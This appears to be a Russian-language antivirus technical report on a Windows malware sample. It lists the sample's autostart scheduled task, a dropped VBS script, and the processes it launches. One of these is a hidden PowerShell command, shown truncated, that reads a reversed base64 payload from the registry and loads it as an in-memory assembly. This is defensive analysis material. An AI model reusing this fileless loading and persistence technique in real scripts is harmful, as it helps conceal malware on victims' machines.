Техническая информация
Для обеспечения автозапуска и распространения
Создает или изменяет следующие файлы
- <SYSTEM32>\tasks\jwihiwlvxzvdujg
Изменения в файловой системе
Создает следующие файлы
- %APPDATA%\jwihiwlvxzvdujg.vbs
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\wscript.exe' "%APPDATA%\jwIHiwlvXzVdUjG.VBS"
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -Command $ll='HKCU:\Software\jwIHiwlvXzVdUjG';$v='test';$ee=gp $ll;$uu=[Convert]::FromBase64String(($ee.$v|%{$_[-1..-($_.Length)]}) -join '');[System.Reflection.Assembly]::L... (со скрытым окном)
- '<SYSTEM32>\taskeng.exe' {C51D9FBB-2C60-4DC3-A183-4A580D380BB0} S-1-5-21-3691498038-2086406363-2140527554-1000:hmhfvpqvygo\user:Interactive:[1]
- '<SYSTEM32>\wscript.exe' "%APPDATA%\jwIHiwlvXzVdUjG.VBS" (со скрытым окном)
